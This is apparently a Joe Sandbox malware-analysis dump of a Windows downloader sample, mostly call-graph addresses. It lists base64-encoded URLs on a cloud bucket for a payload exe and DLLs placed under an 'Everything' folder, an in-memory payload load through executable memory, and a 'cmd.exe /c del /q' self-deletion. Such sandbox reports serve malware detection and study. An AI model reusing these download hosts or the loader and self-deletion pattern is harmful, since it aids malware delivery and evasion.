480f41 ___scrt_is_nonwritable_in_current_image 22368->22369 22370 480f47 22369->22370 22372 480f8a 22369->22372 22389 4813c0 29 API calls 2 library calls 22370->22389 22379 47e89c EnterCriticalSection 22372->22379 22373 480f62 22373->22308 22375 480f96 22380 4810b8 22375->22380 22377 480fac 22390 480fd5 LeaveCriticalSection _Fgetc 22377->22390 22379->22375 22381 4810cb 22380->22381 22382 4810de 22380->22382 22381->22377 22391 480fdf 22382->22391 22384 48118f 22384->22377 22385 481101 22385->22384 22395 47e238 22385->22395 22388 48b1b4 __wsopen_s 41 API calls 22388->22384 22389->22373 22390->22373 22392 481048 22391->22392 22393 480ff0 22391->22393 22392->22385 22393->22392 22401 48b174 41 API calls 2 library calls 22393->22401 22396 47e251 22395->22396 22397 47e278 22395->22397 22396->22397 22398 485e72 _Fgetc 39 API calls 22396->22398 22397->22388 22399 47e26d 22398->22399 22400 487204 __wsopen_s 64 API calls 22399->22400 22400->22397 22401->22392 22403 47e36e ___scrt_is_nonwritable_in_current_image 22402->22403 22404 47e39b 22403->22404 22405 47e378 22403->22405 22407 47e393 22404->22407 22413 47e89c EnterCriticalSection 22404->22413 22428 4813c0 29 API calls 2 library calls 22405->22428 22407->22313 22409 47e3b9 22414 47e3f9 22409->22414 22411 47e3c6 22429 47e3f1 LeaveCriticalSection _Fgetc 22411->22429 22413->22409 22415 47e406 22414->22415 22416 47e429 22414->22416 22434 4813c0 29 API calls 2 library calls 22415->22434 22418 47e238 ___scrt_uninitialize_crt 64 API calls 22416->22418 22419 47e421 22416->22419 22420 47e441 22418->22420 22419->22411 22430 4878d5 22420->22430 22423 485e72 _Fgetc 39 API calls 22424 47e455 22423->22424 22435 4875fc 44 API calls _Fputc 22424->22435 22426 47e45c 22426->22419 22427 487531 ___free_lconv_mon 14 API calls 22426->22427 22427->22419 22428->22407 22429->22407 22431 4878ec 22430->22431 22432 47e449 22430->22432 22431->22432 22433 487531 ___free_lconv_mon 14 API calls 22431->22433 22432->22423 22433->22432 22434->22419 22435->22426 22437 475ea2 22436->22437 22439 475e72 22436->22439 22438 475d90 39 API calls 22437->22438 22440 474b52 22438->22440 22444 475c80 22439->22444 22440->22100 22440->22101 22443 47e487 69 API calls 22443->22437 22445 475c9d 22444->22445 22446 475c92 codecvt char_traits 22444->22446 22445->22443 22446->22445 22447 47eb89 67 API calls 22446->22447 22447->22445 22449 475afb Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 22448->22449 22450 4772b0 71 API calls 22449->22450 22451 47378b 22450->22451 22451->22106 22453 475988 22452->22453 22459 476da0 22453->22459 22455 47599e 22455->22114 22470 473d50 22456->22470 22457 4762f8 22457->22115 22460 476dd7 std::ios_base::good 22459->22460 22461 476dde 22460->22461 22463 476df9 22460->22463 22462 476400 40 API calls 22461->22462 22465 476df2 std::ios_base::good 22462->22465 22464 477140 40 API calls 22463->22464 22467 476e1c std::ios_base::getloc 22463->22467 22464->22467 22465->22455 22466 476400 40 API calls 22466->22465 22468 477890 69 API calls 22467->22468 22469 476e72 shared_ptr ctype char_traits 22467->22469 22468->22469 22469->22465 22469->22466 22471 473d61 22470->22471 22472 475c80 67 API calls 22471->22472 22477 473de1 22471->22477 22473 473d9d 22472->22473 22474 473dca 22473->22474 22473->22477 22478 4811a4 22473->22478 22474->22477 22484 480791 22474->22484 22477->22457 22479 4811b7 _Fputc 22478->22479 22480 480f35 66 API calls 22479->22480 22481 4811cc 22480->22481 22482 47ddcb _Fputc 39 API calls 22481->22482 22483 4811d9 22482->22483 22483->22474 22485 48079c 22484->22485 22486 4807b1 22484->22486 22504 482009 14 API calls __dosmaperr 22485->22504 22488 4807b9 22486->22488 22489 4807ce 22486->22489 22506 482009 14 API calls __dosmaperr 22488->22506 22498 48a551 22489->22498 22491 4807a1 22505 48143d 39 API calls _Allocate 22491->22505 22495 4807be 22507 48143d 39 API calls _Allocate 22495->22507 22499 48a565 _Fputc 22498->22499 22508 489f5a 22499->22508 22502 47ddcb _Fputc 39 API calls 22503 4807c9 22502->22503 22503->22477 22504->22491 22506->22495 22509 489f66 ___scrt_is_nonwritable_in_current_image 22508->22509 22510 489f6d 22509->22510 22511 489f90 22509->22511 22534 4813c0 29 API calls 2 library calls 22510->22534 22519 47e89c EnterCriticalSection 22511->22519 22514 489f9e 22520 489fe9 22514->22520 22515 489f86 22515->22502 22517 489fad 22535 489fdf LeaveCriticalSection _Fgetc 22517->22535 22519->22514 22521 489ff8 22520->22521 22522 48a020 22520->22522 22539 4813c0 29 API calls 2 library calls 22521->22539 22523 485e72 _Fgetc 39 API calls 22522->22523 22525 48a029 22523->22525 22536 48b156 22525->22536 22526 48a013 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22526->22517 22529 48a0d3 22540 48a355 44 API calls 4 library calls 22529->22540 22530 48a0ea 22530->22526 22541 48a18a 43 API calls 2 library calls 22530->22541 22532 48a0e2 22532->22526 22534->22515 22535->22515 22537 48af6e 43 API calls 22536->22537 22538 48a047 22537->22538 22538->22526 22538->22529 22538->22530 22539->22526 22540->22532 22541->22526 22543 477d3b std::ios_base::failure::failure 22542->22543 22546 477d8f task 22543->22546 22548 478560 22543->22548 22545 477d4d 22554 4783d0 39 API calls Concurrency::cancellation_token_source::~cancellation_token_source 22545->22554 22546->22130 22549 47856f 22548->22549 22550 478579 22549->22550 22559 4788e0 40 API calls std::_Xinvalid_argument 22549->22559 22555 4788f0 22550->22555 22554->22546 22556 478923 task 22555->22556 22560 477540 22556->22560 22559->22550 22561 477550 allocator 22560->22561 22564 478370 22561->22564 22565 47837c 22564->22565 22566 47838a 22564->22566 22570 478b30 22565->22570 22568 477559 22566->22568 22578 471490 22566->22578 22568->22545 22571 478b47 22570->22571 22572 478b4c 22570->22572 22581 471400 RaiseException stdext::threads::lock_error::lock_error Concurrency::cancel_current_task 22571->22581 22574 471490 _Allocate 3 API calls 22572->22574 22576 478b55 22574->22576 22577 478b70 22576->22577 22582 48144d 39 API calls 2 library calls 22576->22582 22577->22568 22579 479d53 std::_Facet_Register 3 API calls 22578->22579 22580 47149c 22579->22580 22580->22568 22581->22572 22586 473f50 22583->22586 22584 4762c0 22584->22137 22591 473f5f std::ios_base::failure::failure _Min_value 22586->22591 22587 473f67 22587->22584 22588 474071 22588->22587 22590 480d80 __fread_nolock 53 API calls 22588->22590 22590->22587 22591->22587 22591->22588 22592 480d80 22591->22592 22595 480d9d 22592->22595 22597 480da9 ___scrt_is_nonwritable_in_current_image 22595->22597 22596 480d98 22596->22591 22597->22596 22598 480dbc __fread_nolock 22597->22598 22599 480df3 22597->22599 22622 482009 14 API calls __dosmaperr 22598->22622 22608 47e89c EnterCriticalSection 22599->22608 22602 480dfd 22609 480ba7 22602->22609 22603 480dd6 22623 48143d 39 API calls _Allocate 22603->22623 22608->22602 22610 480bd6 22609->22610 22612 480bb9 __fread_nolock 22609->22612 22624 480e32 LeaveCriticalSection _Fgetc 22610->22624 22611 480bc6 22625 482009 14 API calls __dosmaperr 22611->22625 22612->22610 22612->22611 22614 480c17 _Fgetc 22612->22614 22614->22610 22616 480d42 __fread_nolock 22614->22616 22619 485e72 _Fgetc 39 API calls 22614->22619 22621 48abe3 __fread_nolock 51 API calls 22614->22621 22627 480e3a 39 API calls 4 library calls 22614->22627 22628 482009 14 API calls __dosmaperr 22616->22628 22619->22614 22620 480bcb 22626 48143d 39 API calls _Allocate 22620->22626 22621->22614 22622->22603 22624->22596 22625->22620 22627->22614 22628->22620 22630 475a64 task Concurrency::cancellation_token_source::~cancellation_token_source 22629->22630 22632 473534 22630->22632 22633 477570 39 API calls allocator 22630->22633 22632->22146 22633->22632 22637 474750 22634->22637 22636 473702 22636->22148 22638 47477e 22637->22638 22639 474799 22638->22639 22640 475e60 70 API calls 22638->22640 22639->22636 22640->22639 22642 474750 70 API calls 22641->22642 22643 474bd2 22642->22643 22643->22151 22644->21785 22648 471150 22645->22648 22651 471100 22648->22651 22652 47111f _fread 22651->22652 22655 480750 22652->22655 22656 480764 _Fputc 22655->22656 22661 47ebc3 22656->22661 22659 47ddcb _Fputc 39 API calls 22660 47112e ShellExecuteA ExitProcess 22659->22660 22662 47ec12 22661->22662 22663 47ebef 22661->22663 22662->22663 22665 47ec1a _fread 22662->22665 22672 4813c0 29 API calls 2 library calls 22663->22672 22673 47fa2d 44 API calls 2 library calls 22665->22673 22666 47a256 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 22667 47ed35 22666->22667 22667->22659 22670 47ec9b 22674 47f880 14 API calls ___free_lconv_mon 22670->22674 22671 47ec07 22671->22666 22672->22671 22673->22670 22674->22671 22675 48ba96 22680 48b86c 22675->22680 22678 48bad5 22681 48b88b 22680->22681 22682 48b89e 22681->22682 22690 48b8b3 22681->22690 22700 482009 14 API calls __dosmaperr 22682->22700 22684 48b8a3 22701 48143d 39 API calls _Allocate 22684->22701 22686 48b8ae 22686->22678 22697 495729 22686->22697 22688 48ba84 22706 48143d 39 API calls _Allocate 22688->22706 22695 48b9d3 22690->22695 22702 494f99 39 API calls 3 library calls 22690->22702 22692 48ba23 22692->22695 22703 494f99 39 API calls 3 library calls 22692->22703 22694 48ba41 22694->22695 22704 494f99 39 API calls 3 library calls 22694->22704 22695->22686 22705 482009 14 API calls __dosmaperr 22695->22705 22707 4950d1 22697->22707 22700->22684 22702->22692 22703->22694 22704->22695 22705->22688 22710 4950dd ___scrt_is_nonwritable_in_current_image 22707->22710 22708 4950e4 22727 482009 14 API calls __dosmaperr 22708->22727 22710->22708 22712 49510f 22710->22712 22711 4950e9 22728 48143d 39 API calls _Allocate 22711->22728 22718 4956bb 22712->22718 22717 4950f3 22717->22678 22730 4885d5 22718->22730 22723 4956f1 22725 495133 22723->22725 22726 487531 ___free_lconv_mon 14 API calls 22723->22726 22729 495166 LeaveCriticalSection __wsopen_s 22725->22729 22726->22725 22727->22711 22729->22717 22785 48201c 22730->22785 22733 4885f9 22735 482979 22733->22735 22797 482805 22735->22797 22738 495749 22822 495497 22738->22822 22741 49577b 22854 481ff6 14 API calls __dosmaperr 22741->22854 22742 495794 22840 48ffc3 22742->22840 22746 495780 22855 482009 14 API calls __dosmaperr 22746->22855 22747 4957b9 22853 495402 CreateFileW 22747->22853 22748 4957a2 22856 481ff6 14 API calls __dosmaperr 22748->22856 22752 4957a7 22857 482009 14 API calls __dosmaperr 22752->22857 22754 49586f GetFileType 22755 49587a GetLastError 22754->22755 22756 4958c1 22754->22756 22860 481fae 14 API calls __dosmaperr 22755->22860 22862 48ff0e 15 API calls 2 library calls 22756->22862 22757 495844 GetLastError 22859 481fae 14 API calls __dosmaperr 22757->22859 22760 4957f2 22760->22754 22760->22757 22858 495402 CreateFileW 22760->22858 22761 495888 CloseHandle 22761->22746 22765 4958b1 22761->22765 22764 495837 22764->22754 22764->22757 22861 482009 14 API calls __dosmaperr 22765->22861 22766 4958e2 22771 49592e 22766->22771 22863 495611 73 API calls 3 library calls 22766->22863 22768 4958b6 22768->22746 22773 495935 22771->22773 22865 4951ac 73 API calls 4 library calls 22771->22865 22772 495963 22772->22773 22774 495971 22772->22774 22864 48769f 42 API calls 2 library calls 22773->22864 22775 49578d 22774->22775 22777 4959ed CloseHandle 22774->22777 22775->22723 22866 495402 CreateFileW 22777->22866 22779 495a18 22780 495a22 GetLastError 22779->22780 22781 495a4e 22779->22781 22867 481fae 14 API calls __dosmaperr 22780->22867 22781->22775 22783 495a2e 22868 4900d6 15 API calls 2 library calls 22783->22868 22786 48203a 22785->22786 22792 482033 22785->22792 22786->22792 22794 48642f 39 API calls 3 library calls 22786->22794 22788 48205b 22795 489093 39 API calls __Getctype 22788->22795 22790 482071 22796 4890f1 39 API calls __strnicoll 22790->22796 22792->22733 22793 488a4d 5 API calls std::_Lockit::_Lockit 22792->22793 22793->22733 22794->22788 22795->22790 22796->22792 22798 48282d 22797->22798 22799 482813 22797->22799 22801 482853 22798->22801 22802 482834 22798->22802 22815 4829ba 14 API calls ___free_lconv_mon 22799->22815 22817 48e567 MultiByteToWideChar __strnicoll 22801->22817 22814 48281d 22802->22814 22816 4829fb 15 API calls __wsopen_s 22802->22816 22804 482862 22806 482869 GetLastError 22804->22806 22813 48288f 22804->22813 22820 4829fb 15 API calls __wsopen_s 22804->22820 22818 481fae 14 API calls __dosmaperr 22806->22818 22808 482875 22819 482009 14 API calls __dosmaperr 22808->22819 22811 4828a6 22811->22806 22811->22814 22813->22814 22821 48e567 MultiByteToWideChar __strnicoll 22813->22821 22814->22723 22814->22738 22815->22814 22816->22814 22817->22804 22818->22808 22819->22814 22820->22813 22821->22811 22823 4954d2 22822->22823 22824 4954b8 22822->22824 22869 495427 22823->22869 22824->22823 22876 482009 14 API calls __dosmaperr 22824->22876 22827 4954c7 22877 48143d 39 API calls _Allocate 22827->22877 22830 495539 22837 49558c 22830->22837 22880 483959 39 API calls 2 library calls 22830->22880 22833 495587 22835 495604 22833->22835 22833->22837 22834 49552e 22879 48143d 39 API calls _Allocate 22834->22879 22881 48146a 11 API calls _unexpected 22835->22881 22837->22741 22837->22742 22839 495610 22841 48ffcf ___scrt_is_nonwritable_in_current_image 22840->22841 22884 48150a EnterCriticalSection 22841->22884 22843 48ffd6 22845 48fffb 22843->22845 22849 49006a EnterCriticalSection 22843->22849 22850 49001d 22843->22850 22888 48fd9d 15 API calls 3 library calls 22845->22888 22848 490000 22848->22850 22889 48feeb EnterCriticalSection 22848->22889 22849->22850 22851 490077 LeaveCriticalSection 22849->22851 22885 4900cd 22850->22885 22851->22843 22853->22760 22854->22746 22855->22775 22856->22752 22857->22746 22858->22764 22859->22746 22860->22761 22861->22768 22862->22766 22863->22771 22864->22775 22865->22772 22866->22779 22867->22783 22868->22781 22872 49543f 22869->22872 22870 49545a 22870->22830 22878 482009 14 API calls __dosmaperr 22870->22878 22872->22870 22882 482009 14 API calls __dosmaperr 22872->22882 22873 49547e 22883 48143d 39 API calls _Allocate 22873->22883 22876->22827 22878->22834 22880->22833 22881->22839 22882->22873 22884->22843 22890 481552 LeaveCriticalSection 22885->22890 22887 49003d 22887->22747 22887->22748 22888->22848 22889->22850 22890->22887

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00472FD0: CreateDirectoryA.KERNEL32(C:\Program Files (x86)\Everything,00000000), ref: 00472FF5
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 00473037
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 00473046
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 00473087
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 00473096
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 004730E6
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 004730F8
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 00473148
                                                                    • Part of subcall function 00472FD0: task.LIBCPMTD ref: 0047315A
                                                                  • Sleep.KERNEL32(00000BB8,?,00498613,000000FF), ref: 0047326C
                                                                  • InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 0047328D
                                                                  • InternetOpenUrlA.WININET(00000000,\GJ,00000000,00000000,80000000,00000000), ref: 004732CD
                                                                  • InternetCloseHandle.WININET(?), ref: 004732FE
                                                                  • InternetCloseHandle.WININET(?), ref: 00473361
                                                                  • InternetCloseHandle.WININET(?), ref: 0047336B
                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 0047338C
                                                                  • InternetCloseHandle.WININET(00000000), ref: 004733C6
                                                                  • fpos.LIBCPMTD ref: 00473458
                                                                  • fpos.LIBCPMTD ref: 0047346D
                                                                  • fpos.LIBCPMTD ref: 0047349D
                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,004A479C,00000024,00000040), ref: 004734A5
                                                                  • fpos.LIBCPMTD ref: 004734D5
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00473504
                                                                  • InternetCloseHandle.WININET(00000000), ref: 004733D0
                                                                    • Part of subcall function 00477990: char_traits.LIBCPMTD ref: 004779BD
                                                                    • Part of subcall function 00477990: char_traits.LIBCPMTD ref: 00477B17
                                                                    • Part of subcall function 00477990: char_traits.LIBCPMTD ref: 00477BFC
                                                                    • Part of subcall function 004738F0: fpos.LIBCPMTD ref: 0047399A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeReadSleep
                                                                  • String ID: \GJ$error$error$error$error$error $loader
                                                                  • API String ID: 3533587409-44501451
                                                                  • Opcode ID: 5b4dda256443a9ed1e8d4320a1f955cb4b141ba8898b53b12a226ec3c4a7e510
                                                                  • Instruction ID: d8747c2f4908e05c3c60dec0202a0aa6583635f0a6b93f812478fc52e850ff7a
                                                                  • Opcode Fuzzy Hash: 5b4dda256443a9ed1e8d4320a1f955cb4b141ba8898b53b12a226ec3c4a7e510
                                                                  • Instruction Fuzzy Hash: B681C370A00205ABDB14EBA5DC46BEE7378AB94705F10C11EF119B61C2EBBC5A44CBAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 082de5a3abaaddd6cc5d1673aa08c39a9078923532e83eef74fef55131085ef5
                                                                  • Instruction ID: 67a15eb4e56d69f850ba5ceec95cf42f824a7914f8f1e0641bb6edbe3b4aba30
                                                                  • Opcode Fuzzy Hash: 082de5a3abaaddd6cc5d1673aa08c39a9078923532e83eef74fef55131085ef5
                                                                  • Instruction Fuzzy Hash: E6A19DB5F007146BEF19DFB888606AEBBF2EF84710B00891DD546AB754DF349A068BC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2142124ac4a4b91c4db893985f884587e097cebc41603e6cf1329d7319843f5a
                                                                  • Instruction ID: f3dffb0ea900fcc785fa09a447e8aa50a681179608e27989935daa06c08c62d2
                                                                  • Opcode Fuzzy Hash: 2142124ac4a4b91c4db893985f884587e097cebc41603e6cf1329d7319843f5a
                                                                  • Instruction Fuzzy Hash: 6B914DB4F007146BDF19DFB888606AEBBF2EB84710B408A1CD546BB754DF74AA058BC5

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(C:\Program Files (x86)\Everything,00000000), ref: 00472FF5
                                                                    • Part of subcall function 00472CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00472CDB
                                                                    • Part of subcall function 00472CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00472D19
                                                                    • Part of subcall function 00472CB0: task.LIBCPMTD ref: 00472D25
                                                                    • Part of subcall function 00472CB0: task.LIBCPMTD ref: 00472D70
                                                                    • Part of subcall function 00472CB0: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00472DAC
                                                                    • Part of subcall function 00472CB0: InternetCloseHandle.WININET(00000000), ref: 00472DE6
                                                                    • Part of subcall function 00472CB0: InternetCloseHandle.WININET(00000000), ref: 00472E02
                                                                  • task.LIBCPMTD ref: 00473037
                                                                  • task.LIBCPMTD ref: 00473046
                                                                  • task.LIBCPMTD ref: 00473087
                                                                  • task.LIBCPMTD ref: 00473096
                                                                  • task.LIBCPMTD ref: 004730E6
                                                                  • task.LIBCPMTD ref: 004730F8
                                                                  • task.LIBCPMTD ref: 00473148
                                                                  • task.LIBCPMTD ref: 0047315A
                                                                  • task.LIBCPMTD ref: 004731AA
                                                                  • task.LIBCPMTD ref: 004731BC
                                                                  • task.LIBCPMTD ref: 0047320C
                                                                  • task.LIBCPMTD ref: 0047321E
                                                                  Strings
                                                                  • aHR0cHM6Ly9sZWlzdXJldHJhZGUtMTMyMzU3MTI2OS5jb3MuYXAtYmVpamluZy5teXFjbG91ZC5jb20vemZfY2VmLmRsbA==, xrefs: 004731D8
                                                                  • C:\Program Files (x86)\Everything, xrefs: 00472FF0
                                                                  • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNyMTIwLmRsbA==, xrefs: 0047305F
                                                                  • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl, xrefs: 00472FFB
                                                                  • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tLzEuZXhl, xrefs: 0047300F
                                                                  • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTQwLmRsbA==, xrefs: 00473114
                                                                  • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==, xrefs: 004730FD
                                                                  • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==, xrefs: 0047304B
                                                                  • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL3ZjcnVudGltZTE0MC5kbGw=, xrefs: 004730B2
                                                                  • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHpmX2NlZi5kbGw=, xrefs: 004731C1
                                                                  • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=, xrefs: 0047309B
                                                                  • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTIwLmRsbA==, xrefs: 00473176
                                                                  • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==, xrefs: 0047315F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileRead
                                                                  • String ID: C:\Program Files (x86)\Everything$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHpmX2NlZi5kbGw=$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTIwLmRsbA==$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTQwLmRsbA==$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNyMTIwLmRsbA==$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL3ZjcnVudGltZTE0MC5kbGw=$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tLzEuZXhl$aHR0cHM6Ly9sZWlzdXJldHJhZGUtMTMyMzU3MTI2OS5jb3MuYXAtYmVpamluZy5teXFjbG91ZC5jb20vemZfY2VmLmRsbA==
                                                                  • API String ID: 1727112427-2279345222
                                                                  • Opcode ID: 62b373bce946f30977a49b688392ecfca34e2d01388be77e44e23adb589efab9
                                                                  • Instruction ID: 77f398f5f73b0a21d24f3d64d3ec45dfbc697432e7fc79a63ea4b5cb66d45350
                                                                  • Opcode Fuzzy Hash: 62b373bce946f30977a49b688392ecfca34e2d01388be77e44e23adb589efab9
                                                                  • Instruction Fuzzy Hash: CE515070841648DADB14EBE0DD46BDDB7749B61304FA085DDE119271D2EBB82B08CF99

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000100), ref: 00472F4E
                                                                  • SetPriorityClass.KERNEL32(00000000), ref: 00472F55
                                                                  • GetCurrentThread.KERNEL32 ref: 00472F5D
                                                                  • SetThreadPriority.KERNEL32(00000000), ref: 00472F64
                                                                  • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00472F78
                                                                  • _fwprintf.LIBCONCRTD ref: 00472F92
                                                                    • Part of subcall function 00471170: _fread.LIBCMTD ref: 0047118A
                                                                  • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00472FB1
                                                                  • ExitProcess.KERNEL32 ref: 00472FB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
                                                                  • String ID: /c del /q %s$cmd.exe$open
                                                                  • API String ID: 809167050-3932901086
                                                                  • Opcode ID: d62ecfef815215c35c42dde975b97875422bb69a43a6ffbdf843c1c827308723
                                                                  • Instruction ID: b5546747a7a564eab7d44a90781768ba24cb392a92eb1a8a573767218b294cc5
                                                                  • Opcode Fuzzy Hash: d62ecfef815215c35c42dde975b97875422bb69a43a6ffbdf843c1c827308723
                                                                  • Instruction Fuzzy Hash: DEF01271A44304BBE311BBE4AC0FFE9362CBB59B05F00047AB719990E1DAF45954CB69

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
